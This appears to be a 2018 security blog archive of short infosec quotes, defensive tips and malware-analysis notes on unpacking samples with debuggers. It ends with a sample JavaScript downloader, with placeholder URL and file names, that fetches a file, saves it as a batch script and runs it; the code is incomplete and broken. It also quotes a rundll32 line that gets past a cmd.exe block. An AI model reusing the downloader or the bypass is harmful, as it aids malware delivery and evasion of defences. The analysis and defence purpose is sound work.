Saturday, March 31, 2018

Infosec quotes - patch, limit admin

“...things you can do to limit enterprise breaches:

1. Patch vulnerabilities as soon as possible. 
2. Limit administrative privileges.
3. See numbers 1 and 2.
4. Block uncategorized domains at the proxy.
5. Disallow JAR/EXE/ISO/BAT/VBS/PS1/HTA/JS attachments on inbound emails.


Infosec quotes - remote copy and paste

Remote copy and paste? Yikes.

Friday, March 30, 2018

Infosec quotes - debug mode

Developers make sure debug mode is disabled before you go live in production. It can lead to very bad things. 

Infosec quotes - double whammy

Double whammy. You get a fake flash player malvertisement that runs a bitcoin miner in your browser. Then if you install the fake flash player the payload is the Azorult info stealer. 

viewing virtualalloc contents

run malware with x64dbg
set breakpoint on Virtualalloc

BPX VirtualAlloc

once hit the break point
look in the call stack for last user code
go there, set breakpoint on next line after virtualalloc user call

Once hit breakspoint, look at EAX value (it will be the newly allocated address)
Follow EAX's value in the dump

Then F8 (step over) 1 line at a time until you see data in the dump

It could be data (like IP addresses) or it could be a full executable (MZ header)

If it's an executable (MZ Header) then right-click, "follow in memory map"
Then right-click in memory map in the address and select "dump memory to file"

open the new dumped EXE in PE Bear
If the text segment is all 0s
Then go to the Section Hdrs tab and change all Raw Addr columns to match Virtual Addr

Then go to Optional Hrd tab and change Image Base column to the address found on Memory Map screen in x64dbg

then open in pestudio and the EXE should look normal now, unpacked!  with urls, ips, iocs, etc.

Thursday, March 29, 2018

Infosec quotes - no more single factor

“Password-based, single-factor authentication is no longer a sufficient access control to systems containing sensitive or private information, a fact that is widely known but continues to be a huge weakness for organizations.”

debugging create process, dumping executable content

try setting breakpoint on

because those are one of lowest level apis for creating a process and a lot of the higher level api calls will funnel down to this one eventually

then once breakpoint, go to x64dbg Memory Map and look for "Protection=ERW" which means executable, read, and write ... and look for it outside the normal spots

Looking for MZ (to find a full executable in memory)

Once found, in memory map right-click "Dump memory to file" and save this executable

Load into PE Bear
If text segment is all zeros, then it's unmapped, so you must
- copy Virtual Addr. column values to the Raw Addr. column values on the section headers tab
- under optional header tab, change the image base to the 'address' field in the memory map on the x64dbg
- save the executable under a different name

Infosec quotes - sanitize input

Developers, don’t forget to sanitize any data coming in to your application. 

api monitor places to capture unpacked buffer

ntdll.RtlDecompressBuffer (breakpoint AFTER)
_Out_ PUCHAR UncompressedBuffer,

kernel32.WriteProcessMemory (breakpoint BEFORE)
_In_  LPCVOID lpBuffer,

Infosec quotes - Cisco hard coded cisco password

 “… allow an unauthenticated, remote attacker to log in to a device running an affected release of Cisco IOS XE Software with the default username and password that are used at initial boot. CVE-2018-0150 ...” 

Wednesday, March 28, 2018

Process Hollowing 101

If you see the process creating a copy of itself it's possible process hollowing is occurring

Use "API Monitor" freeware
set it to watch
- CreateProcess
- WriteVirtualMemory
- ResumeThread

Run, find the WriteVirtualMemory api call that seemed to contain an EXE (MZ header)

Set breakpoint on WriteVirtualMemory "before call"

Re-run the sample

Edit Buffer
Find the starting address

Open HxD, attach to memory of running process that is currently breakpointed
Search and find that starting address
Collaspe the buffer to find the start & end address
Select Block, edit the end address
Copy contents

paste into new HxD hex editor window
save as a new EXE

now you have the unpacked program!

rep movsb is like memcpy

When looking at assembly and you see

rep movsb

It can be thought of as a string or memory copy.
It's copying from whatever is as register ESI to register EDI
ESI = the existing malicious code to copy
EDI = the empty virtually allocated memory to copy the malicious code to

Tuesday, March 27, 2018

Infosec quotes - DA/EA

“... Do not.  Let DA/EA accounts. Log in.  To ANYWHERE. Except:
1) domain controllers
2) Triple-secured admin server ...” 

Infosec quotes - fake updates


Infosec quotes - image with ExE inside

Malware using images with embedded executables. 

Infosec quotes - APT adware

What’s your orgs stance on Adware?

“... Adware is often ignored during security operations because it  ... has a low perceived threat level .... Advanced Persistent Adware (APA), is unique because it ...  evade detection, maintain persistence, and connect to a Command and Control (C2) server to facilitate the second stage of the attack...” 

Monday, March 26, 2018

Infosec quotes - rackspace phish

Phishing that claims your rackspace a account has been blocked.

Infosec quotes - disable UAC

“... document with macro
1) disables UAC
2) lowers macro security

Sunday, March 25, 2018

Infosec quotes - wire transfer scams

“... Before submitting any type of wire transfer, contact the alleged recipient via phone first to confirm the transfer. This will help avoid falling prey to phishing scams...” 

Infosec quotes - internal recon

“... Net User/Group /domain is heavily used by attackers to perform reconnaissance...” 

Infosec quotes - PCI TLS

“... PCI DSS requires all retailers to turn off SSL, TLS 1.0 and 1.1 by June...” 

Saturday, March 24, 2018

Infosec quotes - csv file malware

Did you know .CSV filed can deliver malware too? 

Infosec quotes - excel macro interaction

“... Excel macro attempts to evade sandboxes by only triggering when the user interacts with the spreadsheet. It drops a #PowerShell payload ...” 

Infosec quotes - laptop encryption

Take laptop encryption seriously and don’t allow users to get exceptions.

“... If a properly encrypted device that contains protected health information is lost or stolen, there is no data breach ...”

Infosec quotes - external websites go in the DMZ

Public facing Web servers like IIS, Apache, Weblogic, etc should always be in your DMZ.

“... general use case is that the application server has a public face, it can be remotely rooted. If that happens, and a malicious party gains access to your server, he should be isolated in the DMZ network and not have direct access to the private hosts ...” 

Infosec quotes - default password google search

“... No need to hack in, just do a Google search on default password, cuz you know humans are often lazy ... many do not change the passwords...” 

Infosec quotes - password length

“... Length is more powerful than complexity because lengthening passwords makes them exponentially harder to crack....passphrases over complex passwords!”

Infosec quotes - java 6 on internet

“... If you use Java 6 on a server exposed to the public internet, you are asking to be hacked.  Kind of like running an Win NT4 or 2K server on the internet...”

Infoswc quotes - externally exposed admin page

Don’t expose org admin pages to the internet, put them behind VPN or something. And change their default password!

“... sensitive control panel exposed to the internet with admin/admin ...” 

Infosec quotes - company default password

It is a bad idea for your help desk of app admins to give everybody the same new default password. Each one should be unique.

“... Just managed to get 150 accounts including 1 domain admin by spraying the company's default password, and it takes all the fun out of the pen test...” 

Infosec quotes - remove admin rights

“... one of the key findings is by removing admin rights from users you lessen your risk by up to 80%.  By simply limiting these privileges you could close the door on countless potential attacks...”

Infosec quotes - punycode

Consider setting network.IDN_show_punycode to true in about:config if using @firefox 

Infosec quotes - kubernetes

“... If your users have network access to your nodes, then the kubelet API is a full featured unauthenticated API backdoor to your cluster....” 

Infosec quotes - updgrade license

Malicious word doc with interesting popup message.

“... Error 19874: You must have Office Professional Edition to read this content, please upgrade your license...”

Friday, March 23, 2018

Infosec quotes - visual studio code rce

“... Visual Studio Code (1.19.0 to 1.19.2) was silently listening on 9333/tcp. It was a debug port with obvious Remote Code Execution ...”

Infosec quotes - chromos

“... Cromos is a tool for downloading legitimate extensions of the Chrome Web Store and inject codes in the background of the application ...” 

Infosec quotes - uninstall AV

Malware that uninstalls your antivirus. 

Thursday, March 22, 2018

Infosec quotes - notes nsf

IBM Lotus Notes vulnerability.

“... Have an unsuspecting user double-click the nsf file ...” 

Infosec quotes - chafer windows updates

“... Iranian threat group #Chafer masquerade as a windows update ...” 

Infosec quotes - on close

Malicious word doc that doesn’t run macro until office is closed 

Infosec quotes - chrome updates

Don’t click ads that say to update Google Chrome. They deliver malware. 

Tuesday, March 20, 2018

Infosec quotes - EOL router

“... The Cisco router that was abused was an "end of life" network device that ultimately gave the attackers an attack vector...”

Infosec quotes - psexec clear text

“... The developer is using PsExec to execute a script on a remote server. Used in this way (with '-u' and '-p' options), PsExec sends the credentials in clear text across the network...”

Infosec quotes - vt script

“... The password was a strong one but once the file is published on VT, you can consider the password as lost...” 

Monday, March 19, 2018

Infosec quotes - real time queue

Incident Responders need to work their queues in near real-time. Looking at alerts that are days old just doesn’t cut it.

“... CrowdStrike's Global Threat Report found that the average time it takes for an intruder to begin moving laterally to other systems in your network, once a machine has been compromised and a beachhead established, is 1 hour and 58 minutes...” 

Infosec quotes - firewall off

Developers please realize this is always the wrong solution.

“... The developers haven't had any development issues since they were issued root accounts and we disabled the firewall. *Dusts off hands* ...” 

Infosec quotes - sql server Powershell

SQL server Powershell bundle is the old 2.0 with no logging.

“... Living off the land, in a cave with no logging. SQLPS.exe version shown bundled with SQL Server 2008....”

Infosec quotes - you are breached

If a security researcher says you are breached at least take a few minutes to look into it a bit.

“... you reach out to a company to alert them to a network compromise, they flat out state they are doing just fine, and then you find the keylogger dump for that exact email on a C2 server...“ 

Sunday, March 18, 2018

Infosec quotes - Schneider

“... Shodan ... 1.6k+ Schneider structure and energy automation systems are connected to the internet ... NO-AUTH LUA SHELL on port 23...” 

Infosec quotes - admin and patching

“... [User local admin rights] * [unpatched user softwares] =  hack easiness...” 

Saturday, March 17, 2018

Infosec quotes - millions in ransom

The cost of poor DR and backup planning.

“... Linux ransomware attack that demanded an unprecedented 550 Bitcoins (BTC) or $1.62 million ransom ... On 14 June 2017 the web hosting company was able to negotiate the ransom down to 397.6 BTC, nearly $1.01 million, to be paid in three installments...” 

Infosec quotes - fake flash info stealer

Fake Flash Player install is

“... being used to push binary “info stealing” malware to Windows computers...” 

Infosec quotes - extol via gmail attachments

“... PowerShell-RAT exfils data through Gmail attachments...” 

Infosec quotes - objects macros into word docs

“...continuously monitors for doc files ... injects macros into doc files ...” 

Infosec quotes - ad as c2

“... It solves Network segmentation Issues.
Bypasses Internal Firewalls.
No traffic sent to the target....” 

Infosec quotes - Walmart mbm bucket

It’s a broken record by now , but another open S3 bucket.

“... The open S3 bucket, named “walmartsql,” housed an MSSQL database backup ... encrypted credit card details, payment details ... gives the appearance that this is the main customer database for MBM Company Inc.,..” 

Friday, March 16, 2018

Infosec quotes - espionage

“... TTPs from 🇨🇳 espionage
 > PowerShell + bitsadmin + WMI
 > Backdoor comms to legit sites including Github & Technet

Infosec quotes - multi factor required

Any system public facing (email, portals, vpns, paychecks, ticketing systems, etc) absolutely require multi factor authentication nowadays otherwise one stolen credential and your data is gone.

“... The threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not used. ..”

Infosec quotes - Russian local admin

You should eliminate local admin accounts and work towards least privilege. If you haven’t done that yet you better be frequently auditing and monitoring both the accounts and their activity.

“... The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts...” 

Thursday, March 15, 2018

Infosec quotes - updating flash

Let your IT department update your flash player , don’t try to do it yourself.

Malicious “Flash Offer” followed by “flash_setup.exe” 

Infosec quotes - good IT admin

“... 80% of IT Security is just good IT administration. You can't defend what you don't know exists, and you can't detect unusual if you don't know what's normal...” 

Malware Research Lab software installation ideas

Windows Lab Setup
0.) microsoft office was installed & licensed
1.) download & install chrome
2.) download & install notepad++
3.) download notepad++ JStool plugin & add to plugin folder
4.) download notepad++ Compare plugin & add to plugin folder
5.) download & install 7zip
6.) download & install adobe reader
7.) download & install adobe flash
8.) download & install java
9.) download & install python 2
10.) download & install python 3
11.) download & install process hacker
12.) download & install wireshark & winpcap
13.) download & install move mouse (and .net 3.5 if necessary)
14.) download pestudio
15.) download procmon (
16.) download regshot
17.) change folder options to "show hidden files"
18.) change folder options to "show known file extensions"
19.) download PEiD
20.) download DIE (detect it easy)
21.) download ProcDot & graphviz & windump
22.) disable windows defender
23.) disable windows firewall
24.) download officemalscanner
25.) download python scripts, create batch script wrappers to drag & drop files, (python2 -m pip install oletools)
26.) download xorsearch.exe
27.) download scdbg.exe
28.) download jmp2it.exe
29.) download punbup.exe
30.) download lnk_parser_cmd.exe
31.) api monitor
32.) x64dbg
33.) HxD
34.) process explorer
35.) PE Bear

XX.) Rename the common ones (like process explorer, process hacker, wireshark, etc.) to avoid malware that is specifically looking for those executable names
XX.) Restart virtual machine
XX.) Snapshot virtual machine

python script wrapper so you can drag and drop malware onto a script

punbup.exe -d %1 | findstr "DetectionName OriginalName"
punbup.exe -c md5 %1


python2.exe -d %1 | findstr "DetectionName OriginalName"
python2.exe -c md5 %1

Finding sysvol passwords to cleanup

find Group Policy Preferences passwords .  To check if you have this present in your domain you can run this command: 

findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml

Infosec quotes - sysvol passwords

Cleanup is still needed after LAPS implementation.

“... often/still find Group Policy Preferences passwords ...”

Infosec quotes - icebreaker

Hacking has been made too easy.

“... When you're cold and alone staring in at an Active Directory party but don't possess even a single AD credential ...  Sequentially automates 5 internal network attacks ... Use the --auto option to automatically acquire domain admin privileges ...” 

Infosec quotes - win 10 quick support

“... Windows 10 thing ... It has something called quicksupport.exe. It allows you to easily remote control another windows 10 machine with the use of a 6 digit code. Super feature for remote controlling others or if you are not a fan of Teamviewer...” 

Wednesday, March 14, 2018

Infosec quotes - blacklist vs whitelist

Which is more manageable in the long-run?

Blacklisting = infinite number of unknown undefined software you’ll be adding to your blacklist, never ending daily additions

Whitelisting = finite number of software your users are actually using, with occasional additions here and there when users have a new requirement

Infosec quotes - Powershell malware

“ number of PowerShell malware samples that McAfee observed in 2017 was a massive 432% higher than the number observed in 2016...”

Infosec quotes - patching

“... install patches after a reasonable delay ... and test. Just as long as you install them...” 

Infosec quotes - Powershell prompts

“... PowerShell script was posted on Github recently that prompts a victim to enter their login credentials, checks if they are correct, and then sends the credentials to a remote server...”

Infosec quotes - fake flash miner

Fake flash player leads to bitcoin miner 

Infosec quotes - admin internet access

“... All admin accounts should be separated with no internet access...”. 

Infosec quotes - walk in and infect

Just how easy it is to walk into an org and infect their PCs with malware. 

Tuesday, March 13, 2018

Infosec quotes - domain admin internet

@frankmorris said “Allowing domain admin accounts unrestricted access to the Internet is a very bad idea. Please don’t do it or you will be pwned!” 

Infosec quotes - dns logging

DNS logging always has value.

“... Attacks ... have many possible avenues of detection over the network, but a consistent feature of almost all attacks is their usage of DNS...” 

Infosec quotes - hack email and send more

“... gained access to two official email accounts before sending out a series of emails to other government departments ...” 

Infosec quotes - iran

Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign 

Infosec quotes - thumb drive quotes

How well does your org control what USBs users can plug in? Thumb drives are scarey.

“... 29 ways in which attackers could use USB devices to compromise users' computers...”

Infosec quotes - zip with shortcut

Nobody will ever send you a legit zip file with a windows shortcut inside it. So don’t click them they are malicious. 

Monday, March 12, 2018

Infosec quotes - throw away domains

Malicious urls that are basically used once then taken down.

“... register throw-away domains ... HTA runs a .JSE with PowerShell, then the actor de-registers the website...” 

Infosec quotes - passwords in word doc

If you ever get into a position and see a word doc or spreadsheet full of passwords ... say something ... cause they’re doing it wrong. 

Sunday, March 11, 2018

Infosec quotes - disable legacy features

“... Disable Windows Legacy  Features
- Disable WPAD
- Disable LLMNR
- Disable NetBIOS
- Disable Windows Scripting Host (WSH) File Extensions
- Ensure WDigest is disabled
- Remove SMB v1 support 

Infosec quotes - whole org password reset

“... if you have to reset your whole orgs password, how do you calculate that cost? ...”

Infosec quotes - brute login checker

“... With the appropriate login checker and proxy lists to call upon, crooks can turn a single password breach into multiple account breaches, and clean out dozens of accounts within hours of the compromise...” 

Saturday, March 10, 2018

Infosec quotes - red team wins

“... As the Red Team, do we win all the time? Yes we do!  If blue teams improve their defenses, we win because they improve, even if we don't achieve Domain Admin
Remember we are trying to help and improve defenses, otherwise you are missing the point and no better than the attackers...” 

Infosec quotes - rar file extension

“... The .rar extension should hopefully be a red flag for users...” 

Infosec quotes - threat hunting

“... Engaging in threat hunting means that you are taking a more proactive approach to cyber defense. It often begins with the assumption that, regardless of the defenses in place, that there is always the potential that there is a threat that may have evaded detection...” 

Infosec quotes - Powershell & sysmon

Powershell & sysmon logging to your SIEM is important for visibility .

“... Without logging place, you won’t be able to detect a memory (RAM) only credential harvesting attack via PowerShell... A centralized logging solution is highly recommended for PowerShell and Sysmon logging...”

Infosec quotes - Incident Response prep

A key part of Incident Response success. 

“... Educate incident responders with what is ‘normal’ within the environment—installed software, permitted ports and protocols, acceptable use policies, etc...”

Infosec quotes - av is not dead

“... I know AV is supposedly dead and all that, but any decent AV would have prevented this developer's apps from being infected with the Ramnit worm…” 

Infosec quotes - risk acceptance

Risk acceptance should be temporary and require renewal so that owners can reflect on past decisions and determine if new mitigations or better options now exist.

“... Just because you accepted the risk before and it worked out so far, it doesn't mean it won't go wrong eventually...” 

Infosec quotes - printer to domain admin

Take seriously the security hardening of everything you plug into your network. Even printers.

“... It's just a printer... What's the worst that could happen? [SPOILER] Look at me.. I'm the Domain Admin now...” 

Friday, March 9, 2018

Infosec quotes - http CNET

User shouldn’t be downloading their own software especially not from download sites like CNET. IT needs to vet these first. Oh and don’t download from insecure HTTP sites ever or this could happen.

“... Targeted users in Turkey and Syria who downloaded Windows applications from official vendor websites including Avast Antivirus, CCleaner, Opera, and 7-Zip were silently redirected to malicious versions by way of injected HTTP redirects...” 

Infosec quotes - 700 emotet urls

Here’s what your security team is up against. Emotet phishing campaigns are blasted out daily from attackers to your users . Each days campaign has new urls, new payloads , and new c2 traffic. Yesterday’s batch had 700 urls in one day. 

Infosec quotes - fast flux

Good example why your security team needs real-time dns logs.

“... Here’s a simple illustration: If criminals assign a set of IP addresses that change every 150 seconds, users who access are actually connecting to different infected machines every single time...” 

Infosec quotes - block HTA scripts

“...hta powersploit script targeting energy sector ... If you don’t block hta files yet you should ...” 

Infosec quotes - infected by your router

Get infected while configuring your home router.

“... Winbox Loader, an application developed ... to help users configure their routers.’ ... works by downloading some DLLs from the router itself, but the Slingshot group replaced these files with malicious ones that infected the user when he tried to configure  his router ...” 

Infosec quotes - server patching

“... if you have Windows Servers (including 2012 and 2016) which didn’t get hit by WannaCry but still aren’t patched for MS17-010 (SMB1 vulns) then patch now, there’s a crypto mining worm...” 

Thursday, March 8, 2018

Infosec quotes - more hardcoded passwords

This shouldn’t be happening anymore and you’d hope that all of them have been found by now. Wow.

“... Cisco says that an attacker could exploit this vulnerability (CVE-2018-0141) by connecting to the affected system via Secure Shell (SSH) using the hardcoded password...” 

Infosec quotes - always another way

Blacklisting doesn’t work. There always another way. 

“... filter cmd.exe ? try this 
rundll32.exe shell32.dll,ShellExec_RunDLL calc.exe ...” 

Tuesday, March 6, 2018

Infosec quotes - google internal admin pages

The dangers of hooking a company up to the internet in any fashion.

“... Bypassing Google’s authentication to access their Internal Admin panels...” 

Monday, March 5, 2018

Infosec quotes - mailchimp malware

Mailchimp delivering malware invoices since December. 

Infosec quotes - joomla plain text

“... Simple flaw exposes plaintext password for Database, FTP, SMTP servers' of thousands of #Joomla websites...” 

Infosec quotes - bucket to full compromise

Cloud buckets are scarey, do you know what your users are putting out there ?

“... Identified open S3 bucket -> backup files -> credential file -> partial compromise of AWS -> pivot to other cloud instances -> credential file -> full compromise ...” 

Infosec quotes - kali is a Windows app

Do control what apps your users can download from the App Store? 

“... Kali Linux is now an App in the Windows Store. Have Kali run natively in Windows...” 

Infosec quotes - domain admin outside AD

Gaining Domain Admin from Outside Active Directory 

“... mitigations such as using LAPS to manage local administrator passwords and setting FilterAdministratorToken to prevent SMB logins using the local RID 500 account...” 

Infosec quotes - cameras shodan

“... More than 110 thousand cameras exposed in the shodan can be explored ...” 

Sunday, March 4, 2018

Infosec quotes - defender blocks flash player HTA

Windows defender has blocked of 1 million malicious HTA files this year already  , mostly fake flash player updates delivering Kovter 

Infosec quotes - fake chrome updates

Fake updates to Chrome and Flash lead to Ramnit Trojan. 

Saturday, March 3, 2018

Infosec quotes - using what is available

Using what’s already available 

“... COM object interaction w/Internet Explorer to download payload ... powershell.exe loads ieproxy.dll, svchost.exe spawns iexplore.exe
, iexplore.exe makes network connection...” 

Friday, March 2, 2018

Infosec quotes - exchange compromise AD

“... is possible from the Exchange Windows permissions (EWP) security group to compromise the entire prepared Active Directory domain...”  

Infosec quotes - costly emotet

Even the routine phishing campaigns seen daily can be devastating.

“... Emotet Attack Costs City of Allentown, PA $1 Million...” 

Thursday, March 1, 2018

Sample javascript downloader (wscript.exe)

var url = "???url???"
var filepath = "c:\\windows\\temp\\????.bat"
var xhr = new ActiveXObject("MSXML2.XMLHTTP")"GET", url, false)

if (xhr.Status == 200) {

var fso = new ActiveXObject("Scripting.FileSystemObject")
if (fso.FileExists(filepath))

var stream = new ActiveXObject("ADODB.Stream")
stream.Type = 1
stream.Position = 0       

var objShell = new ActiveXObject("");;